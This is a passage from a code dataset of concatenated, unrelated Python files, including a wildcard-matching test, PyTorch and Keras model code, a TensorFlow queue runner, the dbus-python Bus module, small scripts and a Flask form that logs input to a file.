self.assertFalse(n.isMatch(\"pasdgsn\",\"p*d*b\"), \"the pattern doesn't match\")\n self.assertFalse(n.isMatch(\"assbof\",\"bas*\"),\"the pattern doesn't match\")\n self.assertFalse(n.isMatch(\"vvv\",\"?b?\"))\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"Companies/2sigma/wildCardMatchingSolution.py","file_name":"wildCardMatchingSolution.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"514095322","text":"from torch import nn\r\nimport torch\r\nimport numpy as np\r\nimport warnings\r\nimport cv2\r\ndef initialize_weights(*models):\r\n for model in models:\r\n real_init_weights(model)\r\n\r\n\r\ndef real_init_weights(m):\r\n\r\n if isinstance(m, list):\r\n for mini_m in m:\r\n real_init_weights(mini_m)\r\n else:\r\n if isinstance(m, nn.Conv2d): \r\n nn.init.kaiming_normal_(m.weight, nonlinearity='relu')\r\n if m.bias is not None:\r\n nn.init.constant_(m.bias, 0)\r\n elif isinstance(m, nn.Linear):\r\n m.weight.data.normal_(0.0, std=0.01)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n nn.init.constant_(m.weight, 1)\r\n nn.init.constant_(m.bias, 0)\r\n elif isinstance(m,nn.Module):\r\n for mini_m in m.children():\r\n real_init_weights(mini_m)\r\n else:\r\n print( m )\r\n\r\ndef visualize_from_parsing_cls(cls,imsize,num=36):\r\n # imsize : (h,w)\r\n # cls : ch lanes\r\n # num = 36\r\n # warnings.warn('the number of classification num is fixed to {}'.format(num), UserWarning)\r\n h,w = imsize\r\n label = np.zeros(imsize)\r\n\r\n anchor_w = np.linspace(0,w,num + 1)[:-1]\r\n anchor_h = np.linspace(0,h,cls.shape[0]+1)[:-1]\r\n\r\n block_w = anchor_w[1] - anchor_w[0]\r\n block_h = anchor_h[1] - anchor_h[0]\r\n\r\n # ch 
lanes\r\n for i in range(cls.shape[1]):\r\n location = cls[:,i]\r\n for j,loc in enumerate(location):\r\n if loc == num:\r\n continue\r\n \r\n if j == len(location) - 1:\r\n h_end = label.shape[0]\r\n else:\r\n h_end = int(anchor_h[j+1])\r\n if loc == num - 1:\r\n w_end = label.shape[1]\r\n else:\r\n w_end = int(anchor_w[loc+1])\r\n label[int(anchor_h[j]):h_end,int(anchor_w[loc]):w_end] = i+1\r\n return label\r\n\r\ndef generate_seg_from_parsing_cls(cls,imsize,width,num=36):\r\n # num = 36\r\n # warnings.warn('the number of classification num is fixed to {}'.format(num), UserWarning)\r\n h,w = imsize\r\n \r\n\r\n anchor_w = np.linspace(0,w,num + 1)[:-1]\r\n anchor_h = np.linspace(0,h,cls.shape[0]+1)[:-1]\r\n\r\n block_w = anchor_w[1] - anchor_w[0]\r\n block_h = anchor_h[1] - anchor_h[0]\r\n label_all = []\r\n exists = []\r\n # ch lanes\r\n # import pdb;pdb.set_trace()\r\n \r\n for i in range(cls.shape[1]):\r\n label = np.zeros((h,w,3)).astype(np.uint8)\r\n location = cls[:,i]\r\n pts = []\r\n for j,loc in enumerate(location):\r\n if loc == num:\r\n continue\r\n pts.append((int(anchor_w[loc] + 0.5 * block_w),int(anchor_h[j])))\r\n \r\n # if j == len(location) - 1:\r\n # h_end = label.shape[0]\r\n # else:\r\n # h_end = int(anchor_h[j+1])\r\n # if loc == num - 1:\r\n # w_end = label.shape[1]\r\n # else:\r\n # w_end = int(anchor_w[loc+1])\r\n # label[int(anchor_h[j]):h_end,int(anchor_w[loc]):w_end] = i+1\r\n if len(pts) >= 2:\r\n exists.append(1)\r\n pre_pt = pts[0]\r\n for j in range(1,len(pts)):\r\n cv2.line(label,pre_pt,pts[j],(255,255,255),width)\r\n pre_pt = pts[j]\r\n else:\r\n exists.append(0)\r\n label_all.append(label)\r\n return label_all,exists","sub_path":"fix/nas_lane_seg/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"424381282","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"A `QueueRunner` that takes a feed function as an argument.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.python.framework import errors\nfrom tensorflow.python.platform import tf_logging as logging\nfrom tensorflow.python.training import queue_runner as qr\n\n\nclass FeedingQueueRunner(qr.QueueRunner):\n \"\"\"A queue runner that allows the feeding of values such as numpy arrays.\"\"\"\n\n def __init__(self, queue=None, enqueue_ops=None, close_op=None,\n cancel_op=None, feed_fn=None):\n \"\"\"Initialize the queue runner.\n\n For further documentation, see `queue_runner.py`. Note that\n `FeedingQueueRunner` does not support construction from protobuffer nor\n serialization to protobuffer.\n\n Args:\n queue: A `Queue`.\n enqueue_ops: List of enqueue ops to run in threads later.\n close_op: Op to close the queue. 
Pending enqueue ops are preserved.\n cancel_op: Op to close the queue and cancel pending enqueue ops.\n feed_fn: a function that returns a dictionary mapping fed `Tensor`s to\n values.\n \"\"\"\n super(FeedingQueueRunner, self).__init__(queue, enqueue_ops, close_op,\n cancel_op)\n self._feed_fn = feed_fn\n\n # pylint: disable=broad-except\n def _run(self, sess, enqueue_op, coord=None):\n \"\"\"Execute the enqueue op in a loop, close the queue in case of error.\n\n Args:\n sess: A `Session`.\n enqueue_op: The `Operation` to run.\n coord: Optional `Coordinator` object for reporting errors and checking\n for stop conditions.\n\n \"\"\"\n # TODO(jamieas): Reduce code duplication with `QueueRunner`.\n decremented = False\n try:\n while True:\n if coord and coord.should_stop():\n break\n try:\n feed_dict = None if self._feed_fn is None else self._feed_fn()\n sess.run(enqueue_op, feed_dict=feed_dict)\n except errors.OutOfRangeError:\n # This exception indicates that a queue was closed.\n with self._lock:\n self._runs -= 1\n decremented = True\n if self._runs == 0:\n try:\n sess.run(self._close_op)\n except Exception as e:\n # Intentionally ignore errors from close_op.\n logging.vlog(1, \"Ignored exception: %s\", str(e))\n return\n except Exception as e:\n # This catches all other exceptions.\n if coord:\n coord.request_stop(e)\n else:\n logging.error(\"Exception in QueueRunner: %s\", str(e))\n with self._lock:\n self._exceptions_raised.append(e)\n raise\n finally:\n # Make sure we account for all terminations: normal or errors.\n if not decremented:\n with self._lock:\n self._runs -= 1\n\n def _init_from_proto(self, queue_runner_def):\n raise NotImplementedError(\n \"{} does not support initialization from proto.\".format(type(\n self).__name__))\n\n def to_proto(self):\n raise NotImplementedError(\n \"{} does not support serialization to proto.\".format(type(\n self).__name__))\n","sub_path":"tensorflow/contrib/learn/python/learn/dataframe/queues/feeding_queue_runner.py","file_name":"feeding_queue_runner.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"599873577","text":"import sys\nimport signal\nimport logging\nfrom datetime import datetime\n\nfrom psycopg2.extensions import connection\nfrom elasticsearch.client import Elasticsearch\n\n\nclass TerminateProtected:\n def __init__(self, pg_conn: connection, es: Elasticsearch) -> None:\n self.pg_conn = pg_conn\n self.es = es\n self.killed = False\n\n def _handler(self, signum, frame):\n logging.info(\"End etl_app at %s\", datetime.now())\n self.pg_conn.close()\n logging.info(\"Postgres connection has been closed correctly\")\n self.es.transport.close()\n logging.info(\"Elasticsearch connection has been closed correctly\")\n self.killed = True\n\n def __enter__(self):\n self.old_sigint = signal.signal(signal.SIGINT, self._handler)\n self.old_sigterm = signal.signal(signal.SIGTERM, self._handler)\n\n def __exit__(self, type, value, traceback):\n if self.killed:\n sys.exit(0)\n signal.signal(signal.SIGINT, self.old_sigint)\n signal.signal(signal.SIGTERM, self.old_sigterm)\n","sub_path":"postgres_to_es/correct_terminate.py","file_name":"correct_terminate.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"223290704","text":"s = input()\ntemp = s.split()\ndictionary = dict()\nfor i in range(len(s)):\n if s[i] not in dictionary:\n dictionary[s[i]] = 1\n 
else:\n        dictionary[s[i]] += 1\n\noddLetter = 0\n\nfor i,j in dictionary.items():\n    if (j % 2 != 0):\n        oddLetter += 1\n\nif oddLetter <= 1:\n    print(\"First\")\nelif (oddLetter % 2) == 0:\n    print(\"Second\")\nelse:\n    print(\"First\")\n","sub_path":"CodeForces/B. Little Girl and Game.py","file_name":"B. Little Girl and Game.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"136192984","text":"\"\"\"Valid Parentheses: 1. order is correct; 2. brackets type should be matched.\"\"\"\ns = '([)]'\n\nstack = []\nmapping = {\")\": \"(\", \"]\": \"[\", \"}\": \"{\"}\nfor char in s:\n    if char in mapping:\n        top_ele = stack.pop() if stack else '#'\n        if mapping[char] != top_ele:\n            print(False)\n    else:\n        stack.append(char)\nprint(not stack)\n","sub_path":"Problem0020_ValidParentheses.py","file_name":"Problem0020_ValidParentheses.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"579779737","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\n# DataFrame.from_csv was removed from pandas; read_csv with index_col=0 is the equivalent\np = pd.read_csv('hormones.csv', index_col=0).reset_index().set_index('case')\nsix = p.loc[p.time == 6].drop('time', axis=1)\nnine = p.loc[p.time == 9].drop('time', axis=1)\n\nf, (a1, a2) = plt.subplots(1,2,sharey=True)\nsix.transpose().plot(kind='bar', ax=a1)\na1.set_title('6h')\nplt.sca(a1)\nplt.xticks(rotation=0)\n\nnine.transpose().plot(kind='bar', ax=a2)\na2.set_title('9h')\nplt.sca(a2)\nplt.xticks(rotation=0)\nplt.show()\n","sub_path":"hormones/hormone.py","file_name":"hormone.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"64356895","text":"import os\nimport shutil\n\npath = \"H:\\Music\\CloudMusic\"\nlistdir1 = os.listdir(path)\ni = len(listdir1)\nprint (i)\nfor j in range(i):\n    print(listdir1[j])\n    file = path + '\\\\' + listdir1[j]\n    isdir = os.path.isdir(file)\n    if isdir:\n        childPath = os.listdir(file)\n        len1 = len(childPath)\n        for k in range(len1):\n            result = file + '\\\\' + childPath[k]\n            childFileName = path + '\\\\' + childPath[k]\n            print (childFileName)\n            os.rename(result, childFileName)\n        if len1 == 0:\n            os.removedirs(file)\n","sub_path":"fanli/379/379.py","file_name":"379.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"532831176","text":"#!/usr/bin/env python\n\nimport subprocess\nfrom rofi import Rofi\n\ndef main():\n    r = Rofi('no-config')\n    name = r.text_entry('Name for screenshot:')\n\n    # pass the command as an argument list so no shell is required\n    subprocess.check_output(['scrot', str(name)])\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"scripts/screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"234271187","text":"# The purpose of this program is to set up a simple hash-map capable of simple storage and retrieval of words or phrases\n\nclass HashMap:\n    map = [] # the map itself will be a list of lists\n    buckets = 100 # specifies the number of buckets in the table when initialized\n\n    # initializes hash-map as a list of empty lists in the quantity specified by self.buckets\n    def __init__(self):\n        # initialize map to a list of empty lists for use as buckets\n        self.map = [[] for i in range(self.buckets)]\n\n    # produces a repeatable hash code corresponding to an index in the 
hash-map outer list for use in searches\n    def _hash_(self, term):\n        hash_code = 0\n        # the hash code used for this map is the sum of the uppercase ascii values of all characters in the string,\n        # compressed into bucket quantity as in self.buckets - collisions will likely be common\n        # hash code calculate\n        for char in term.upper():\n            hash_code += ord(char)\n        return hash_code % self.buckets\n\n    # private - conducts a search for a term in the hash-map, return binary True or False depending on if value is found\n    def _search_(self, term):\n        # terms are stored in uppercase, so the membership test must be uppercase as well\n        return term.upper() in self.map[self._hash_(term)]\n\n    # public - conducts a search using _search_ and outputs a corresponding user message for a given search term\n    def find(self, term):\n        if self._search_(term):\n            print(term + \" is a member\")\n        else:\n            print(term + \" is not a member\")\n\n    # inserts a term into the appropriate bucket if term is not found in a search to prevent redundant entries\n    def insert(self, term):\n        if not self._search_(term):\n            # then insert\n            self.map[self._hash_(term)].insert(0, term.upper())\n\n    # removes a term from its bucket if present\n    def remove(self, term):\n        if self._search_(term):\n            # then remove the stored (uppercase) value\n            self.map[self._hash_(term)].remove(term.upper())\n\n    # prints all contents of all buckets to terminal\n    def display(self):\n        for i in range(self.buckets):\n            print(str(i), end = \": \")\n            for j in range(len(self.map[i])):\n                print(self.map[i][j], end = \", \")\n            print(\" \")\n\n# MAIN\n# band names will be the stored entries in the map as they require the utmost speed in searches\nband_list = [\"Wilco\", \"King Gizzard and the Lizard Wizard\", \"Death From Above 1979\", \"Ween\", \"Queens of the Stone Age\",\n             \"The White Stripes\", \"Jack White\", \"The Raconteurs\", \"The Dead Weather\", \"The Hentchmen\", \"Royal Blood\",\n             \"Twin Peaks\", \"Black Lips\", \"Ty Segall\", \"The Beatles\", \"Led Zeppelin\", \"Dr. Dog\", \"Parquet Courts\",\n             \"The Chats\", \"The Flaming Lips\", \"Eagles of Death Metal\", \"Mac DeMarco\", \"Thee Oh Sees\", \"Arctic Monkeys\",\n             \"Neutral Milk Hotel\", \"The Mars Volta\", \"Them Crooked Vultures\", \"IDLES\", \"Iggy Pop\", \"The Stooges\",\n             \"Rancid\", \"Streetlight Manifesto\", \"Reel Big Fish\", \"Less Than Jake\", \"FIDLAR\", \"Wavves\", \"Daughters\",\n             \"SWANS\", \"Death Grips\", \"Pink Floyd\", \"Gogol Bordello\", \"The Rolling Stones\", \"Gorillaz\", \"Babe Rainbow\",\n             \"Amyl and the Sniffers\", \"Stonefield\", \"Bob Dylan\", \"Creedence Clearwater Revival\", \"Screeching Weasel\",\n             \"David Bowie\", \"The Velvet Underground\", \"Father John Misty\", \"Desert Sessions\", \"Johnny Cash\"]\n\nbands = HashMap()\n\n# populate bands HashMap from band list\nfor i in range(len(band_list)):\n    bands.insert(band_list[i])\n\nbands.display()\n","sub_path":"Makeup_Assignment/nicole_hash_table.py","file_name":"nicole_hash_table.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"230760044","text":"#! 
/usr/bin/env python3\n#-*- coding: UTF-8 -*-\n\n### Legal\n#\n# Author: Thomas DEBESSE \n# License: ISC\n#\n\n\nimport sys\nfrom colorama import Fore, Style, init\n\n\n# keep an eye on the default Python's print function\n_print = print\n\nverbosely = False\n\n\ndef print(message):\n\tif sys.stdout.isatty():\n\t\tmessage = Fore.GREEN + message + Style.RESET_ALL\n\t_print(message)\n\n\ndef verbose(message):\n\tif verbosely:\n\t\tif sys.stdout.isatty():\n\t\t\tmessage = Style.DIM + message + Style.RESET_ALL\n\n\t\t_print(message)\n\n\ndef warning(message):\n\tmessage = \"Warning: \" + message\n\n\tif sys.stdout.isatty():\n\t\tmessage = Fore.YELLOW + message + Style.RESET_ALL\n\n\t_print(message)\n\n\ndef notice(message):\n\tmessage = \"Notice: \" + message\n\n\tif sys.stdout.isatty():\n\t\tmessage = Style.BRIGHT + message + Style.RESET_ALL\n\n\t_print(message)\n\n\ndef error(message, silent=False):\n\t_message = message\n\tmessage = \"Error: \" + message\n\n\tif sys.stdout.isatty():\n\t\tmessage = Fore.RED + message + Style.RESET_ALL\n\t_print(message)\n\n\tif silent:\n\t\traise SystemExit()\n\telse:\n\t\traise ValueError(_message)\n","sub_path":"Urcheon/Ui.py","file_name":"Ui.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"100646811","text":"\"\"\"Implementation for dbus.Bus. Not to be imported directly.\"\"\"\n\n# Copyright (C) 2003, 2004, 2005, 2006 Red Hat Inc. \n# Copyright (C) 2003 David Zeuthen\n# Copyright (C) 2004 Rob Taylor\n# Copyright (C) 2005, 2006 Collabora Ltd. \n#\n# SPDX-License-Identifier: MIT\n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use, copy,\n# modify, merge, publish, distribute, sublicense, and/or sell copies\n# of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\nfrom __future__ import generators\n\n__all__ = ('Bus', 'SystemBus', 'SessionBus', 'StarterBus')\n__docformat__ = 'reStructuredText'\n\nfrom dbus.exceptions import DBusException\nfrom _dbus_bindings import (\n BUS_DAEMON_IFACE, BUS_DAEMON_NAME, BUS_DAEMON_PATH, BUS_SESSION,\n BUS_STARTER, BUS_SYSTEM, DBUS_START_REPLY_ALREADY_RUNNING,\n DBUS_START_REPLY_SUCCESS, validate_bus_name,\n validate_interface_name, validate_member_name, validate_object_path)\nfrom dbus.bus import BusConnection\nfrom dbus.lowlevel import SignalMessage\nfrom dbus._compat import is_py2\n\n\nclass Bus(BusConnection):\n \"\"\"A connection to one of three possible standard buses, the SESSION,\n SYSTEM, or STARTER bus. 
This class manages shared connections to those\n buses.\n\n If you're trying to subclass `Bus`, you may be better off subclassing\n `BusConnection`, which doesn't have all this magic.\n \"\"\"\n\n _shared_instances = {}\n\n def __new__(cls, bus_type=BusConnection.TYPE_SESSION, private=False,\n mainloop=None):\n \"\"\"Constructor, returning an existing instance where appropriate.\n\n The returned instance is actually always an instance of `SessionBus`,\n `SystemBus` or `StarterBus`.\n\n :Parameters:\n `bus_type` : cls.TYPE_SESSION, cls.TYPE_SYSTEM or cls.TYPE_STARTER\n Connect to the appropriate bus\n `private` : bool\n If true, never return an existing shared instance, but instead\n return a private connection.\n\n :Deprecated: since 0.82.3. Use dbus.bus.BusConnection for\n private connections.\n\n `mainloop` : dbus.mainloop.NativeMainLoop\n The main loop to use. The default is to use the default\n main loop if one has been set up, or raise an exception\n if none has been.\n :Changed: in dbus-python 0.80:\n converted from a wrapper around a Connection to a Connection\n subclass.\n \"\"\"\n if (not private and bus_type in cls._shared_instances):\n return cls._shared_instances[bus_type]\n\n # this is a bit odd, but we create instances of the subtypes\n # so we can return the shared instances if someone tries to\n # construct one of them (otherwise we'd eg try and return an\n # instance of Bus from __new__ in SessionBus). why are there\n # three ways to construct this class? we just don't know.\n if bus_type == BUS_SESSION:\n subclass = SessionBus\n elif bus_type == BUS_SYSTEM:\n subclass = SystemBus\n elif bus_type == BUS_STARTER:\n subclass = StarterBus\n else:\n raise ValueError('invalid bus_type %s' % bus_type)\n\n bus = BusConnection.__new__(subclass, bus_type, mainloop=mainloop)\n\n bus._bus_type = bus_type\n\n if not private:\n cls._shared_instances[bus_type] = bus\n\n return bus\n\n def close(self):\n t = self._bus_type\n if self.__class__._shared_instances.get(t) is self:\n del self.__class__._shared_instances[t]\n super(Bus, self).close()\n\n def get_connection(self):\n \"\"\"Return self, for backwards compatibility with earlier dbus-python\n versions where Bus was not a subclass of Connection.\n\n :Deprecated: since 0.80.0\n \"\"\"\n return self\n _connection = property(get_connection, None, None,\n \"\"\"self._connection == self, for backwards\n compatibility with earlier dbus-python versions\n where Bus was not a subclass of Connection.\"\"\")\n\n def get_session(private=False):\n \"\"\"Static method that returns a connection to the session bus.\n\n :Parameters:\n `private` : bool\n If true, do not return a shared connection.\n \"\"\"\n return SessionBus(private=private)\n\n get_session = staticmethod(get_session)\n\n def get_system(private=False):\n \"\"\"Static method that returns a connection to the system bus.\n\n :Parameters:\n `private` : bool\n If true, do not return a shared connection.\n \"\"\"\n return SystemBus(private=private)\n\n get_system = staticmethod(get_system)\n\n\n def get_starter(private=False):\n \"\"\"Static method that returns a connection to the starter bus.\n\n :Parameters:\n `private` : bool\n If true, do not return a shared connection.\n \"\"\"\n return StarterBus(private=private)\n\n get_starter = staticmethod(get_starter)\n\n def __repr__(self):\n if self._bus_type == BUS_SESSION:\n name = 'session'\n elif self._bus_type == BUS_SYSTEM:\n name = 'system'\n elif self._bus_type == BUS_STARTER:\n name = 'starter'\n else:\n name = 'unknown bus type'\n\n 
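# e.g. <dbus._dbus.SessionBus (session) at 0x...>\n        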
return '<%s.%s (%s) at %#x>' % (self.__class__.__module__,\n self.__class__.__name__,\n name, id(self))\n __str__ = __repr__\n\n\n# FIXME: Drop the subclasses here? I can't think why we'd ever want\n# polymorphism\nclass SystemBus(Bus):\n \"\"\"The system-wide message bus.\"\"\"\n def __new__(cls, private=False, mainloop=None):\n \"\"\"Return a connection to the system bus.\n\n :Parameters:\n `private` : bool\n If true, never return an existing shared instance, but instead\n return a private connection.\n `mainloop` : dbus.mainloop.NativeMainLoop\n The main loop to use. The default is to use the default\n main loop if one has been set up, or raise an exception\n if none has been.\n \"\"\"\n return Bus.__new__(cls, Bus.TYPE_SYSTEM, mainloop=mainloop,\n private=private)\n\nclass SessionBus(Bus):\n \"\"\"The session (current login) message bus.\"\"\"\n def __new__(cls, private=False, mainloop=None):\n \"\"\"Return a connection to the session bus.\n\n :Parameters:\n `private` : bool\n If true, never return an existing shared instance, but instead\n return a private connection.\n `mainloop` : dbus.mainloop.NativeMainLoop\n The main loop to use. The default is to use the default\n main loop if one has been set up, or raise an exception\n if none has been.\n \"\"\"\n return Bus.__new__(cls, Bus.TYPE_SESSION, private=private,\n mainloop=mainloop)\n\nclass StarterBus(Bus):\n \"\"\"The bus that activated this process (only valid if\n this process was launched by DBus activation).\n \"\"\"\n def __new__(cls, private=False, mainloop=None):\n \"\"\"Return a connection to the bus that activated this process.\n\n :Parameters:\n `private` : bool\n If true, never return an existing shared instance, but instead\n return a private connection.\n `mainloop` : dbus.mainloop.NativeMainLoop\n The main loop to use. 
The default is to use the default\n main loop if one has been set up, or raise an exception\n if none has been.\n \"\"\"\n return Bus.__new__(cls, Bus.TYPE_STARTER, private=private,\n mainloop=mainloop)\n","sub_path":"dbus/_dbus.py","file_name":"_dbus.py","file_ext":"py","file_size_in_byte":8783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113243767","text":"import pretrainedmodels\nimport torch\nimport torchvision\nfrom torch import nn\nfrom torch.nn import functional as F\n\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\n\nclass PolyNet(nn.Module):\n\n def __init__(self, parameters):\n\n super().__init__()\n self.pretrained = parameters['pretrained']\n self.model_name = parameters['model_name']\n self.num_classes = parameters['num_classes']\n self.num_channels = parameters['num_channels']\n self.pooling_output_dim = parameters['pooling_output_dim']\n self.output_features = parameters['pooling_output_dim'] ** 2\n self.debug = False\n self.dropout = True\n self.dropout_p = 0.2\n\n if self.pretrained:\n self.polynet = pretrainedmodels.__dict__['polynet'](\n num_classes=1000, pretrained='imagenet')\n else:\n self.polynet = pretrainedmodels.__dict__['polynet'](\n num_classes=1000, pretrained=None)\n\n self.polynet.avg_pool = nn.AdaptiveMaxPool2d((\n self.pooling_output_dim, self.pooling_output_dim))\n self.polynet.last_linear = nn.Linear(\n in_features=self.output_features * 2048,\n out_features=self.num_classes,\n bias=True)\n\n def forward(self, x):\n\n x[:, 0, :, :] = (x[:, 0, :, :] - mean[0]) / std[0]\n x[:, 1, :, :] = (x[:, 1, :, :] - mean[1]) / std[1]\n x[:, 2, :, :] = (x[:, 2, :, :] - mean[2]) / std[2]\n\n if self.debug:\n print('input: {}'.format(x.size()))\n\n out = self.polynet(x)\n\n if self.debug:\n print('out', out.size())\n\n return out\n","sub_path":"pytorch/models_pretrained/polynet.py","file_name":"polynet.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"551373106","text":"from flask import Flask, render_template_string, request\n# ssh @ssh.pythonanywhere.com\napp = Flask(__name__)\nhtml = \"\"\"\n
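<!-- minimal form: one text field named \"line\" posted to /sent -->\n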
    <form action=\"/sent\" method=\"post\">\n
    <input type=\"text\" name=\"line\">\n
    <input type=\"submit\" value=\"send\">\n
    </form>\n
    \n\"\"\"\n@app.route(\"/\")\ndef index():\n return render_template_string(html)\n\n@app.route(\"/sent\", methods=[\"GET\",\"POST\"])\ndef sent():\n line = None\n if request.method == \"POST\":\n line = request.form[\"line\"]\n with open(\"user_input_flask.txt\", \"a+\") as target:\n target.write(line+\"\\n\")\n return render_template_string(html)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"99.py","file_name":"99.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"146606","text":"#pandas \n\nimport pandas as pd\n\n\n#읽기(새로운 파일로) \ndf2 = pd.read_csv('/Users/hyeonseongjun/Desktop/inflearn/section2/test/bnmva23-1/csv_s2.csv',sep=';', skiprows=[0],header=None,names=['Name','Test1','Test2','Test3','Final','Grade'])#sep는 구분자이다 \n# print(df)\n\n#컬럼 내용 추가 \n# df2['Grade'] = df2['Grade'].str.replace('C','A++')\n# print(df2)\n\n#평균 컬럼 추가 \ndf2['Avg'] = df2[['Test1','Test2','Test3','Final']].mean(axis=1)#여러개는 [[]]로 넣어준다 1은 row행을 나타낸다 mean은 최소값이지만 평균을 나타냄 \n# print(df2)\n\n#합계 컬럼 추가 \ndf2['Sum'] = df2[['Test1','Test2','Test3','Final']].sum(axis=1)\nprint(df2)\n\ndf2.to_csv('/Users/hyeonseongjun/Desktop/inflearn/section2/test/bnmva23-1/result_s1.csv',index=False)","sub_path":"download4-5-2.py","file_name":"download4-5-2.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"463557804","text":"from keras.layers import Dense, Embedding, Input, SpatialDropout1D, Flatten, Dropout, ActivityRegularization, concatenate\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers.pooling import MaxPooling1D\nfrom keras.models import Model\nfrom tensorflow.contrib.keras import regularizers\n\nfrom keras.layers import Dense, Bidirectional, Input, Flatten, Embedding, TimeDistributed, multiply\n\nfrom keras import backend as K\nfrom keras.layers.core import SpatialDropout1D, Dropout, Reshape, Lambda, Permute, RepeatVector\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\n\nfrom keras import backend as K\nfrom keras.layers import LSTM, Dense, Input, Embedding, Bidirectional, GRU\nfrom keras.layers.core import SpatialDropout1D, Reshape, Lambda, Permute, RepeatVector\nfrom keras.models import Model\nfrom tensorflow.contrib.keras.python.keras.layers import merge\n\n\nfrom attention_layrer import Attention, AttentionWithContext\n\ndef get_config():\n return {\n 'embedding_size': 30,\n 'dropout_embedding': 0.6,\n\n 'cnn_dilation_rates': '1',\n 'cnn_windows': '12',\n 'cnn_num_filters': 200,\n 'cnn_filter_strides': '1',\n 'cnn_pool_sizes': ['all,all,all'],\n\n 'lstm_layer_size': 32,\n 'recurrent_dropout': 0.2,\n\n 'l2_reg_lambda': 0.001,\n\n 'attention': True,\n\n 'dense_layer_size': None,\n 'dropout_prob': 0.2\n }\n\n\ndef create_model(embeddings, config=get_config(), sentence_length=100):\n\n config['sentence_length']=sentence_length\n\n # sentence attention\n attention_input = Input(shape=(config['sentence_length'] - 2, config['embedding_size'],), dtype='float32')\n\n x = Permute((2, 1))(attention_input)\n x = Reshape((config['embedding_size'], config['sentence_length'] - 2))(x)\n x = Dense(config['sentence_length'] - 2, activation='softmax', bias=True)(x)\n\n x = Lambda(lambda x: K.mean(x, axis=1), name='attention_vector_sentence')(x)\n x = RepeatVector(config['embedding_size'])(x)\n # x = Lambda(lambda x: x, name='attention_vector_sentence')(x)\n\n 
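# permute the repeated weights back to (timesteps, embedding) so they align with attention_input\n    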
